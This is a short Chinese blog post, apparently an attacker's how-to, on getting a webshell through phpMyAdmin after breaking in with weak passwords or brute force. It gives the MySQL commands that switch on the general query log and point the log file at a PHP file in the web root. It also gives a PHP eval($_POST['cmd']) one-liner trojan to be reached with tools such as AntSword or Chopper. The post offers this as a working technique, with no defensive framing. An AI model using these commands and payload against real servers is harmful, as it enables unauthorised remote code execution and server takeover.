phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。
我这边经过弱口令,爆破,目录泄露等途径已进入PhpMyadmin
收集有用信息
查看数据库路存放径
Select @@datadir;
成功获取数据库地址,这里呢凭自己经验来猜测根目录吧。
在这里我就不详写了,我在这里也只是写个思路!!!
那么问题来了!既然我们有了根目录,我们可以怎么写shell呢?
利用日志文件
mysql 5.0版本以上会创建日志文件,修改日志的全局变量,也可以getshell。但是也要对生成的日志有可读可写的权限。
(可以从信息收集得到,我们的Mysql版本是>5.0的)
查看日志状态
show variables like '%general%';
开启general时,所执行的sql语句都会出现在*******.log文件。那么,如果修改general_log_file的值,所执行的sql语句会生成shell
开启日志读写
SET GLOBAL general_log='on'
既然开启了,那我们就来简单的Getshell
创建文件
SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'
对应就会生成123.php文件
那我们开始写一句话
SELECT '<?php eval($_POST["cmd"]);?>'
一句话木马生成在根目录,直接用蚁剑或者菜刀链接即可
这里我就不把shell截图出来了!
总结:这篇文章我也只是简单的提及一下思路,我之前也是因为没有根目录就算有了对方的phpmyadmin我依旧没法子getshell,所以我就写了这一篇文章,给各位在phpmyadmin getshell之路的大佬们。